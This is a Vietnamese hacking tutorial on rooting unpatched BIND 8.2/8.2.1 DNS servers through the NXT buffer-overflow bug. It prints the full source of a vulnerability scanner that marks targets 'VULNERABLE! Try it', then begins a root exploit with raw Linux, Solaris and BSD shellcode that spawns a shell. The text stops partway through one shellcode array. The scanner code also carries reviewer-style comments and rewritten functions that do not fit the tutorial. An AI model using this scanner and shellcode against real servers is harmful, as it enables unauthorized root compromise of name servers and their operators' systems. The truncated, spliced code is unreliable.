Hack BIND 8.2/8.2.1 qua bug "NXT"
Các máy chủ tên miền (DNS server) chạy BIND 8.2/8.2.1 không xử lí chính xác các record NXT. Điều này tạo điều kiện cho attacker có thể làm tràn bộ đệm của BIND và thi hành các mã lệnh tùy ý trên máy chủ tên miền, mà cụ thể nhất là lấy root (theo CA-99-14, ngày 10/11/1999).
Dưới đây là cách để hack các máy chủ tên miền chạy BIND 8.2/8.2.1 gặp bug "nxt" nhưng chưa được patch
Bước 1: scan các DNS server gặp bug "nxt" bằng CBIND (cảm ơn Nguyễn Xuân Bình nha)
/* BIND NXT vulnerable SCANNER - CBIND */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* DO NOT EDIT THIS LINE */
#define SCAN_EXE "./nmap -p 53 "
/* EDIT: directory of NMAP */
#define SCAN_DIR "/home/lb0gspm/tmp/nmap/"
/* EDIT: directory of CBIND and it's temporary files */
#define CBIND_DIR "/home/lb0gspm/tmp/cbind/"
#define R1_DIR "/home/lb0gspm/tmp/cbind/result1.cbind"
#define R2_DIR "/home/lb0gspm/tmp/cbind/result2.cbind"
int Scan( char *ip );
char *GetSubnet( char *ip );
char *ChangeSubnet( char *ip, char *subnet );
char *itoa( int i );
/*
 * CBIND entry point: parses the command line (-s / -f / -i plus one target
 * name or address), resolves the target and hands it to Scan().
 * Review notes: none of the malloc() results below are checked or freed,
 * the fixed-size buffers are filled with strcpy()/strcat() without any
 * length check, and the file opened in the -f branch is never closed
 * (see the notes at the individual call sites).
 */
int main( int argc, char *argv[] )
{
struct in_addr addr;
struct hostent *host_entry;
/* option[0] = -i, option[1] = -s, option[2] = -f; wait_st is never used */
unsigned short int option[3], i, wait_st;
unsigned char *name;
unsigned char *cmd;
unsigned char *ip, *subnet, *ip_s;
unsigned char *temp;
FILE *fp;
printf( "Check BIND v 2.00b \n" );
printf( "Bind NXT vulnerablity scanner\n\n" );
/* 200 / 16 / 16 / 4 / 50 bytes.  The 50-byte cmd buffer is smaller than
 * the command strings assembled in the -f branch below. */
name = (char *)malloc( 200 );
ip = (char *)malloc( 16 );
ip_s = (char *)malloc( 16 );
subnet = (char *)malloc( 4 );
cmd = (char *)malloc( 50 );
if( argc == 1 )
{
printf( "Options: \n" );
printf( " -s SUB-NET SCAN ( SLOW BUT HIGH PRECISE )\n" );
printf( " -f SUB-NET SCAN ( FAST BUT LOW PRECISE / NMAP REQUIRE )\n" );
printf( " -i PRINT INFOMATION\n\n" );
printf( "Examples: \n" );
printf( " cbind victim.com ( IT WILL SCAN IF TARGET IS VULNERABLE OR NOT )\n" );
printf( " cbind victim.com -s ( IT WILL SCAN ALL SUB-NETs IN DETAIL )\n" );
printf( " cbind -f victim.com ( IT WILL SCAN SUB-NETs LOW PRECISE )\n\n" );
exit(0);
} else {
/* the three modes are mutually exclusive; each test below rejects the
 * combinations that were already seen */
option[0] = 0;
option[1] = 0;
option[2] = 0;
for( i = 1; i < argc; i++ )
{
if( strcmp( argv[i], "-s" ) == 0 )
{
if( option[2] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use option -s with -i.\n" );
exit(0);
}
printf( "Sub-net( high precise ) scan mode ACTIVATED.\n" );
printf( "It can takes long.\n\n" );
option[1] = 1;
continue;
}
if( strcmp( argv[i], "-f" ) == 0 )
{
if( option[1] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use options -f with -i.\n" );
exit(0);
}
printf( "Sub-net( low precise ) scan mode ACTIVATED.\n" );
printf( "It require NMAP 2.07 or higher version.\n\n" );
option[2] = 1;
continue;
}
if( strcmp( argv[i], "-i" ) == 0 )
{
if( (option[1] == 1) || (option[2] == 1) )
{
printf( "Can not use option -i with -s(or -f).\n" );
exit(0);
}
option[0] = 1;
continue;
}
/* Any other argument is the target: an unbounded copy into the 200-byte
 * buffer, and a later argument silently overwrites an earlier one. */
strcpy( name, argv[i] );
}
}
/* Root is required up front; nothing in this file itself needs it -
 * presumably it is for the nmap scan in the -f branch. */
if( geteuid() != 0 )
{
printf( "Error! You are not ROOT!\n" );
exit(0);
}
/* Hostname branch.  Note the boundaries: a name starting with '0' or '9'
 * satisfies this test AND the numeric test below, so both branches run. */
if( (name[0] <= '0') || (name[0] >= '9') )
{
host_entry = gethostbyname( name );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
/* h_addr is only dereferenced when the lookup succeeded: the NULL case
 * exits above unless -i was given, and -i also skips this block. */
addr = *((struct in_addr *)host_entry->h_addr);
/* ip now points at inet_ntoa()'s static buffer; the 16 bytes malloc'd
 * for it above are leaked. */
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
/* Dotted-quad branch.  gethostbyaddr() expects the binary address and its
 * size, but is given the ASCII string and its strlen(), so this lookup is
 * expected to fail and numeric targets end in "Can not scan". */
if( (name[0] >= '0') && (name[0] <= '9') )
{
host_entry = gethostbyaddr( name, strlen(name), AF_INET );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
/* Single-host mode (no option given). */
if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) )
{
Scan( ip );
printf( "Scanning Done.\n" );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
}
/* -s: one child per last-octet value 0..255.  The parent wait()s right
 * after each fork() (a failed fork, -1, also lands in the else branch),
 * so the scans run one at a time rather than in parallel. */
if( option[1] == 1 )
{
for( i = 0; i < 256; i++ )
{
if( fork() == 0 )
{
strcpy( subnet, itoa( i ) );
ip_s = ChangeSubnet( ip, subnet );
Scan( ip_s );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
} else {
wait( NULL );
}
continue;
}
printf( "Scanning Done.\n" );
exit(0);
}
/* -f: run nmap over name/24 and parse its report.  SCAN_EXE, "/24", " > "
 * and R1_DIR alone are 56 bytes, more than the 50 allocated for cmd, so
 * this overflows the heap buffer before name is even appended; and name
 * comes straight from argv, so any shell metacharacters in it are
 * interpreted by system(). */
if( option[2] == 1 )
{
strcpy( cmd, SCAN_EXE );
strcat( cmd, name );
strcat( cmd, "/24" );
strcat( cmd, " > " );
strcat( cmd, R1_DIR );
chdir( SCAN_DIR );
system( cmd );
strcpy( cmd, "grep \"Interesting\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
/* fopen() returns a pointer; "pointer < 0" is never true, so a NULL
 * result is not caught here and fgets() below would be handed NULL. */
if( ( fp = fopen( R2_DIR, "r" ) ) < 0 )
{
printf( "File Open Error!\n" );
exit(0);
}
while( 1 )
{
bzero( name, 200 );
/* A fresh 200-byte buffer per line.  On EOF fgets() returns NULL, the
 * pointer is overwritten and that buffer is leaked. */
temp = (char *)malloc( 200 );
strcpy( temp, " " );
temp = fgets( temp, 100, fp );
if( temp == NULL ) break;
/* Column-based parsing of the lines grep "Interesting" kept: digits and
 * dots from column 23 when column 21 is blank, otherwise any non-blank
 * bytes from column 21.  The offsets presumably match the nmap output
 * layout the author used - verify against the installed version. */
if( temp[21] == ' ' )
{
for( i = 0; i < 16; i++ )
{
if( (temp[i+23] != ' ') && (temp[i+23] != ')') )
{
if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )
{
name[i] = temp[i+23];
} else {
if( temp[i+23] == '.' )
name[i] = temp[i+23];
}
}
}
}
if( temp[21] != ' ' )
{
for( i = 0; i < 50; i++ )
{
if( temp[i+21] != ' ' ) name[i] = temp[i+21];
}
}
Scan( name );
free(temp);
}
remove( R1_DIR );
remove( R2_DIR );
}
if( option[0] == 1 )
{
printf( "Creator : Laks Bluesky\n" );
printf( "E-mail : lb0gspm@hanmail.net\n\n" );
printf( "Version : 2.00 beta\n\n" );
printf( "2000.06.19\n" );
exit(0);
}
}
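/*
 * Render the integer i in decimal into a freshly malloc'd, NUL-terminated
 * string and return it; the caller owns (and frees) the buffer.
 * Returns NULL if the allocation fails.
 * The original hand-rolled the digits for 0..999 only and reached the end
 * of the function without a return statement for anything larger or
 * negative (undefined behaviour); snprintf() covers the whole int range.
 */
char *itoa( int i )
{
/* optional '-', at most 3 decimal digits per byte of int, and the NUL */
enum { ITOA_BUF = 3 * sizeof( int ) + 2 };
char *ret;
ret = malloc( ITOA_BUF );
if( ret == NULL )
return NULL;
snprintf( ret, ITOA_BUF, "%d", i );
return ret;
}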
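/*
 * Build a copy of the dotted-quad string ip with everything after its
 * third dot replaced by the text in subnet (the author's name for the
 * last octet, as produced by GetSubnet() or itoa()).  subnet must be a
 * NUL-terminated string.
 * Returns a malloc'd, NUL-terminated string of at most 15 characters that
 * the caller owns, or NULL if ip has fewer than three dots or the
 * allocation fails.
 * The original walked ip without a bound (running off the end when it had
 * fewer than three dots), always copied four bytes of subnet whatever its
 * length, and could leave the result unterminated.
 */
char *ChangeSubnet( char *ip, char *subnet )
{
enum { IP_BUF = 16 }; /* "255.255.255.255" plus the NUL */
char *ip_s;
const char *tail = ip;
int dots = 0;
/* advance to the character after the third dot, never past the NUL */
while( *tail != '\0' && dots != 3 )
{
if( *tail++ == '.' )
dots++;
}
if( dots != 3 )
return NULL;
ip_s = malloc( IP_BUF );
if( ip_s == NULL )
return NULL;
/* the prefix up to and including the third dot, then the new octet;
 * snprintf() both bounds the copy and terminates the result */
snprintf( ip_s, IP_BUF, "%.*s%s", (int)( tail - ip ), ip, subnet );
return ip_s;
}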
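/*
 * Return the last octet of the dotted-quad string ip - the text after its
 * third dot - as a malloc'd, NUL-terminated string of at most three
 * characters that the caller owns.  Returns NULL if ip has fewer than
 * three dots or the allocation fails.
 * The original walked past the end of a string with fewer than three dots
 * and copied four raw bytes into a 4-byte buffer, which for a one- or
 * two-digit octet reads beyond ip's terminator and leaves the result
 * dependent on whatever followed it.
 */
char *GetSubnet( char *ip )
{
enum { OCTET_BUF = 4 }; /* "255" plus the NUL */
char *ret;
const char *tail = ip;
int dots = 0;
/* advance to the character after the third dot, never past the NUL */
while( *tail != '\0' && dots != 3 )
{
if( *tail++ == '.' )
dots++;
}
if( dots != 3 )
return NULL;
ret = malloc( OCTET_BUF );
if( ret == NULL )
return NULL;
/* snprintf() drops anything beyond three characters and terminates */
snprintf( ret, OCTET_BUF, "%s", tail );
return ret;
}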
/*
 * Scan(): asks the name server at ip for its version banner by shelling
 * out to dig for the CHAOS-class TXT record "version.bind", greps the
 * answer into R2_DIR and compares the quoted text against a short list of
 * version strings.  Always returns 0; the verdict is only printed.
 * Defender's note: the banner is whatever the server chooses to report -
 * BIND's `version` option in named.conf overrides it - so a match here is
 * a hint, not proof, and CHAOS-class version.bind queries are easy to log
 * and alert on.
 */
int Scan( char *ip )
{
unsigned short int i;
/* unsigned: fgetc()'s EOF (-1) becomes 0xFF and is never recognised */
unsigned char c;
unsigned char *cmd;
unsigned char *version;
FILE *fp;
struct stat result;
/* 200 bytes for the two commands below (fixed parts are 81 and 98 bytes);
 * 9 bytes for the banner text, never freed; fp is never closed */
cmd = (char *)malloc( 200 );
version = (char *)malloc( 9 );
printf( "Scanning... %s\n", ip );
/* ip is spliced into a shell command line.  Callers pass either
 * inet_ntoa() output or text parsed from nmap's report; nothing here
 * escapes it before system() hands it to the shell. */
strcpy( cmd, "dig @" );
strcat( cmd, ip );
strcat( cmd, " version.bind chaos txt > " );
strcat( cmd, R1_DIR );
strcat( cmd, " 2> /dev/null" );
system( cmd );
strcpy( cmd, "grep \"VERSION.BIND.\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
/* stat()'s return value is ignored: if R2_DIR does not exist, result is
 * never written and st_size is read uninitialised below. */
stat( R2_DIR, &result );
if( result.st_size < 30 )
{
chdir( CBIND_DIR );
return 0;
}
/* fopen() returns a pointer; "pointer >= 0" holds for NULL as well, so a
 * failed open is not caught and the else branch below is unreachable. */
if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 )
{
/* Skip the first 29 bytes of the grep output, then copy up to 9 more
 * bytes of the quoted banner.  The offset presumably matches the dig
 * output layout of the day - verify against the dig version in use.
 * If no closing quote is seen within those 9 bytes, version is left
 * without a terminator and the strcmp() calls below read past it. */
for( i = 0; i < 29; i++ )
{
c = fgetc( fp );
}
for( i = 0; i < 9; i++ )
{
c = fgetc( fp );
if( c == '"' )
{
version[i] = '\0';
break;
}
version[i] = c;
}
} else {
chdir( CBIND_DIR );
return 0;
}
/* The three reporting branches below are identical, and the remaining
 * comparisons do nothing the final fall-through does not already do. */
if( strcmp( version, "8.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.1" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. :)\n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2-P5" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.1.2" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
chdir( CBIND_DIR );
return 0;
}* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND
NSLOOKUP
# nslookup
Default Server: ns.yourco.bogus
Address: 333.333.333.333
> set class=chaos
> set type=txt
> version.bind
Server: ns.yourco.bogus
Address: 333.333.333.333
VERSION.BIND text = "8.2.2-P5"
>
DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)
dig version.bind txt chaos @<server>
hoặc
dig @<server> txt chaos version.bind
Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt"
Bước 2: lấy root shell bằng T666
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d};
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,
